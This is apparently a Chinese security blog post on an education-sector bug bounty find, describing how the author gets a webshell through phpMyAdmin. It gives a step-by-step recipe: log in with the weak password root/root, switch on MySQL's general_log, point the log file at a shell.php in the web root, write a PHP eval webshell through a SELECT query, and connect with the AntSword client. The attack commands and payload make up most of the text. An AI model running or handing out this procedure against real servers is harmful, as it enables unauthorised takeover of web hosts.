edusrc-通过phpmyadmin日志致getshell(后续推出证书站)
Z00Kiss123
- 关注
edusrc-通过phpmyadmin日志致getshell(后续推出证书站)

扫描获取phpmyadmin并通过弱口令进入后台!
弱密码root root
查看mysql的日志状态
查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销
show global variables like '%secure%';
general_log为是否支持写入
general_log_file为日志保存的位置
打开日志读写setglobal general_log =on;
修改邮箱日志路径
修改一下路径set global general_log_file='C:\myphp_www\PHPTutorial\MySQL\data\shell.php';
写入马
将马写入日志中!!!
通过select查询操作写入日志
查看一下是否写入:select '<?php @eval($_POST[xxx]); ?';>
成功写入
再通过phpinfo查找一下绝对路径
最后成功连接
总结步骤:
1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态
2、set global general_log = on; 开启general_log模式
3、set global general_log_file='日志路径\shell.php'; 修改日志目录为shell地址
(set global general_log_file='C:\myphp_www\PHPTutorial\WWW\public\shell.php';)
4、select ' <?php eval($_POST[cc]);? '
写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中
5.日志路径通过扫描端口phpinfo.php获得
6.连接蚁剑!
本文为 Z00Kiss123 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
edusrc某证书站挖掘分享(越权)
2023-02-20